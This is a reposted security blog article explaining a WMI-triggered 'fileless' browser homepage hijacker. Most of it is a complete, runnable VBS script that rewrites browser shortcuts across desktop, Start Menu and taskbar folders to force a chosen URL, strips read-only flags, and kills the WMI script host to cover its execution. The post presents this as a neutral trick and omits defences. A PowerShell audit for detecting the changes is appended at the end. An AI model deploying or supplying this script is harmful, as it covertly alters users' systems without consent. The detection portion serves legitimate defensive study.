Fileless Browser Hijacker: Hijacking the Browser Homepage

Posted by admin on 2021-09-04 05:44:17

From:
http://zone.wooyun.org/content/26997

http://blog.zemana.com/2016/04/yeabestscc-fileless-browser-hijacker_24.html
---
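0x00 Introduction
A VBS script that, when executed, changes the homepage of the common browsers on the current system.
Invoking this script on a timer through WMI achieves a fileless hijack of the browser homepage.
The original article already gives the defence and detection methods, so they are omitted here.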
---
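0x01 Application
A technique is neither good nor bad in itself.
Having learned this trick, we can equally use it to lock our own browser.
The VBS code follows; the homepage is locked to http://www.baidu.com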

' Point every browser shortcut (.lnk) found in the folders below at "link"
' by writing the URL into the shortcut's Arguments field.
On Error Resume Next
Const link = "http://www.baidu.com"
browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe")
' Lookup table of browser executable names, keyed in lower case
Set BrowserDic = CreateObject("Scripting.Dictionary")
For Each browser In browsers
    BrowserDic.Add LCase(browser), browser
Next
' Folders that hold desktop, Start Menu, Quick Launch and pinned shortcuts
' ("a" is the local user name on the author's machine)
Dim FoldersDic(11)
Set WshShell = CreateObject("WScript.Shell")
FoldersDic(0) = "C:\Users\Public\Desktop"
FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu"
FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(4) = "C:\Users\a\Desktop"
FoldersDic(5) = "C:\Users\a\AppData\Roaming\Microsoft\Windows\Start Menu"
FoldersDic(6) = "C:\Users\a\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
FoldersDic(7) = "C:\Users\a\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(8) = "C:\Users\a\AppData\Roaming"
FoldersDic(9) = "C:\Users\a\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
FoldersDic(10) = "C:\Users\a\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu"
FoldersDic(11) = "C:\Users\a\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar"
Set fso = CreateObject("Scripting.FileSystemObject")
For i = 0 To UBound(FoldersDic)
    For Each file In fso.GetFolder(FoldersDic(i)).Files
        If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
            Set oShellLink = WshShell.CreateShortcut(file.Path)
            path = oShellLink.TargetPath
            name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
            ' Only touch shortcuts whose target is one of the listed browsers
            If BrowserDic.Exists(LCase(name)) Then
                oShellLink.Arguments = link
                ' Clear the read-only attribute so the shortcut can be saved
                If file.Attributes And 1 Then
                    file.Attributes = file.Attributes - 1
                End If
                oShellLink.Save
            End If
        End If
    Next
Next
' Terminate scrcons.exe, the WMI script consumer host that runs this script when it is invoked through WMI
CreateObject("WScript.Shell").Run "cmd /c taskkill /f /im scrcons.exe", 0


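After it runs, the homepage of the browsers on the system is changed, as shown in the figure:

[Figure: Fileless Browser Hijacker hijacking the browser homepage]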
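To check a machine for the two traces described above (browser shortcuts carrying a URL argument, and a script consumer registered in WMI), the following PowerShell audit is an added example and not part of the original post. The browser names are taken from the VBS script; the folder roots are an assumption that generalises its hard-coded paths for user "a" to every profile under the system drive.

```powershell
# Added example (not from the original post): audit for the changes the VBS script makes.
# Browser names come from the script; the folder roots below are an assumption that
# generalises its hard-coded "C:\Users\a\..." paths to all local profiles.
$browsers = 'iexplore.exe','chrome.exe','firefox.exe','360chrome.exe','360se.exe',
            'sogouexplorer.exe','opera.exe','safari.exe','maxthon.exe','ttraveler.exe',
            'theworld.exe','baidubrowser.exe','liebao.exe','qqbrowser.exe'

$roots = @("$env:PUBLIC\Desktop", "$env:ProgramData\Microsoft\Windows\Start Menu")
foreach ($p in Get-ChildItem "$env:SystemDrive\Users" -Directory -ErrorAction SilentlyContinue) {
    $roots += "$($p.FullName)\Desktop",
              "$($p.FullName)\AppData\Roaming\Microsoft\Windows\Start Menu",
              "$($p.FullName)\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
}

# 1) Shortcuts: a browser .lnk normally has no URL in Arguments.
$shell = New-Object -ComObject WScript.Shell
$lnkFindings = foreach ($root in ($roots | Where-Object { Test-Path $_ })) {
    Get-ChildItem -Path $root -Filter *.lnk -Recurse -Force -ErrorAction SilentlyContinue |
    ForEach-Object {
        $lnk = $shell.CreateShortcut($_.FullName)      # opens the existing .lnk for reading
        $exe = [IO.Path]::GetFileName($lnk.TargetPath).ToLower()
        if ($browsers -contains $exe -and $lnk.Arguments -match 'https?://|www\.') {
            [pscustomobject]@{
                Shortcut  = $_.FullName
                Target    = $lnk.TargetPath
                Arguments = $lnk.Arguments
                Modified  = $_.LastWriteTime
            }
        }
    }
}
$lnkFindings | Format-List

# 2) WMI: script consumers (run by scrcons.exe) and the filters they are bound to.
Get-CimInstance -Namespace root/subscription -ClassName ActiveScriptEventConsumer |
    Select-Object Name, ScriptingEngine, ScriptFileName, ScriptText | Format-List
Get-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding |
    Select-Object Filter, Consumer | Format-List
```

Run it from an elevated prompt, since reading the root/subscription namespace typically requires administrator rights. A flagged shortcut is restored by clearing its Arguments field; the script only reports and changes nothing.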

This article was first published on the WeChat official account 关注安全技术: Fileless Browser Hijacker: Hijacking the Browser Homepage
